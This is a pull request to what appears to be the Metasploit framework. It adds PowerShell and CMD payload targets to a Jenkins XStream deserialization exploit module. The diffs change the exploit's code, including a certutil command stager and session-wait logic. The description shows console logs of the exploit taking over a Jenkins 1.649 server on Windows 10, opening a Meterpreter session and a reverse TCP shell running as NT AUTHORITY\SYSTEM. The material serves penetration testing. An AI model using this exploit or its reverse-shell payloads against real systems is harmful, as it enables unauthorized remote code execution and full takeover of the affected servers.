### PR TITLE
Add powershell payload to jenkins_xstream_deserialize module

### DIFF
--- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
+++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
@@ -47,6 +47,16 @@ class MetasploitModule < Msf::Exploit::Remote
           'Platform'   => 'win',
           'Arch'       => [ARCH_X86, ARCH_X64]
         ],
+        ['Windows (CMD)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_CMD],
+          'Payload' => {
+            'Compat'     => {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'adduser, generic'
+            }
+          }
+        ],
         ['Linux (Dropper)',
           'Platform'   => 'linux',
           'Arch'       => [ARCH_X86, ARCH_X64]
@@ -62,7 +72,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
       OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
-      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for connect back", 30]),
       Opt::RPORT('8080')
     ])
     deregister_options('URIPATH')
@@ -88,22 +97,25 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     case target.name
-    when /Unix/, /Python/, /PowerShell/
+    when /Unix/, /Python/, /CMD/
       execute_command(payload.encoded)
+    when /PowerShell/
+      execute_command(payload.encoded)
+      wait_for_session
     else
-      execute_cmdstager
+      execute_cmdstager({:flavor => :certutil})
+      wait_for_session
     end
   end
 
   # Exploit methods
-
   def execute_command(cmd, opts = {})
     cmd = case target.name
     when /Unix/, /Linux/
       %W{/bin/sh -c #{cmd}}
     when /Python/
       %W{python -c #{cmd}}
-    when /Windows/
+    when /Windows/, /CMD/
       %W{cmd.exe /c #{cmd}}
     when /PowerShell/
       psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
@@ -120,10 +132,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype'    => 'application/xml',
       'data'     => xstream_payload(cmd)
     )
-    wait_for_powershell_session
   end
 
-  def wait_for_powershell_session
+  def wait_for_session
     print_status "Waiting for exploit to complete..."
     begin
       Timeout.timeout(datastore['ListenerTimeout']) do

--- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
+++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
@@ -43,6 +43,10 @@ class MetasploitModule < Msf::Exploit::Remote
           'Platform'   => 'python',
           'Arch'       => ARCH_PYTHON
         ],
+        ['PowerShell (In-Memory)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_X86, ARCH_X64]
+        ],
         ['Linux (Dropper)',
           'Platform'   => 'linux',
           'Arch'       => [ARCH_X86, ARCH_X64]
@@ -57,6 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
+      OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
+      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for connect back", 30]),
       Opt::RPORT('8080')
     ])
     deregister_options('URIPATH')
@@ -82,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     case target.name
-    when /Unix/, /Python/
+    when /Unix/, /Python/, /PowerShell/
       execute_command(payload.encoded)
     else
       execute_cmdstager
@@ -99,6 +105,9 @@ class MetasploitModule < Msf::Exploit::Remote
       %W{python -c #{cmd}}
     when /Windows/
       %W{cmd.exe /c #{cmd}}
+    when /PowerShell/
+      psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
+      %W{cmd.exe /c #{cmd_psh_payload(cmd, payload_instance.arch.first, psh_opts)}}
     end
 
     # Encode each command argument with XML entities
@@ -111,6 +120,21 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype'    => 'application/xml',
       'data'     => xstream_payload(cmd)
     )
+    wait_for_powershell_session
+  end
+
+  def wait_for_powershell_session
+    print_status "Waiting for exploit to complete..."
+    begin
+      Timeout.timeout(datastore['ListenerTimeout']) do
+        loop do
+          break if session_created?
+          Rex.sleep(0.25)
+        end
+      end
+    rescue ::Timeout::Error
+      fail_with(Failure::Unknown, "Timeout waiting for exploit to complete")
+    end
   end
 
   def xstream_payload(cmd)


### PR DESCRIPTION
Add a powershell payload to the jenkins_xstream_deserialize module

See [Original pull request for Jenkins installation links/instructions](https://github.com/rapid7/metasploit-framework/pull/9183)

## Meterpreter Verification - Targeting Jenkins 1.649 on Windows 10:
```
msf > use exploit/multi/http/jenkins_xstream_deserialize 
msf exploit(multi/http/jenkins_xstream_deserialize) > set target 2
target => 2
msf exploit(multi/http/jenkins_xstream_deserialize) > set RHOST 192.168.1.36
RHOST => 192.168.1.36
msf exploit(multi/http/jenkins_xstream_deserialize) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/http/jenkins_xstream_deserialize) > set LHOST 192.168.1.176 
LHOST => 192.168.1.176
msf exploit(multi/http/jenkins_xstream_deserialize) > exploit
[*] Exploit running as background job 0.
msf exploit(multi/http/jenkins_xstream_deserialize) > 
[*] Started reverse TCP handler on 192.168.1.176:4444 
[*] Waiting for exploit to complete...
[*] Sending stage (205891 bytes) to 192.168.1.36
[*] Meterpreter session 1 opened (192.168.1.176:4444 -> 192.168.1.36:50204) at 2018-01-16 14:44:28 +0000

msf exploit(multi/http/jenkins_xstream_deserialize) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

## Reverse Shell Verification -  Targeting Jenkins 1.649 on Windows 10:

```
msf exploit(multi/http/jenkins_xstream_deserialize) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf exploit(multi/http/jenkins_xstream_deserialize) > exploit
[*] Exploit running as background job 1.
msf exploit(multi/http/jenkins_xstream_deserialize) > 
[*] Started reverse TCP handler on 192.168.1.176:4444 
[*] Waiting for exploit to complete...
[*] Sending stage (336 bytes) to 192.168.1.36
[*] Command shell session 2 opened (192.168.1.176:4444 -> 192.168.1.36:50206) at 2018-01-16 14:46:19 +0000

msf exploit(multi/http/jenkins_xstream_deserialize) > sessions 2
[*] Starting interaction with 2...

Microsoft Windows [Version 10.0.16299.125]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Jenkins>whoami
whoami
nt authority\system
```


